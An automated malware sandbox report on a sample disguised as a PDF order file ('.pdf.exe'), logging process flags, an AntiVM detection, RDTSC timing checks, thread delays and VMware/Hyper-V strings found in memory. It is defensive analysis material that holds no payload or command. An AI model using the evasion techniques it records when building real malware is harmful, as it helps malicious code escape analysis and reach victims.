Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6508, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 799904 second address: 79990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 799B6E second address: 799B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Memory allocated: 1050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Memory allocated: 7C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Memory allocated: 8C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Memory allocated: 8DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Memory allocated: 9DB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe

Code function: 4_2_00409AA0 rdtsc

4_2_00409AA0

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6070	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3687	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2779	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 7164	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 874	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9327	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_6-13821

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 2.0 %

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe TID: 2924	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2232	Thread sleep count: 2779 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2232	Thread sleep time: -5558000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2232	Thread sleep count: 7164 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2232	Thread sleep time: -14328000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6532	Thread sleep count: 129 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6532	Thread sleep time: -258000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6532	Thread sleep count: 9327 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6532	Thread sleep time: -18654000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000003.3875781902.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2121785718.00000000010C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}n
Source: explorer.exe, 00000006.00000002.4545985269.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000006.00000000.2113534114.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2105787269.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.2104403018.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000006.00000000.2105787269.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000006.00000003.3875781902.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2121785718.00000000010C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000006.00000000.2113534114.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.2105787269.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000006.00000000.2105787269.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000006.00000000.2104403018.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
